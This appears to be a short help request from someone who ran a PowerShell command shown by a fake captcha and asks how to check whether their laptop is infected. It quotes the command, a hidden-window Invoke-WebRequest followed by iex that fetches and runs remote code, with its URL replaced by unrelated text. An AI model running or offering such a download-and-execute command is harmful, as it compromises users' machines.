by accident I run this prompt (powershell.exe -W Hidden -command $uR='Account Suspended $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t) by a fake captcha what should i do to check if my laptop is effected
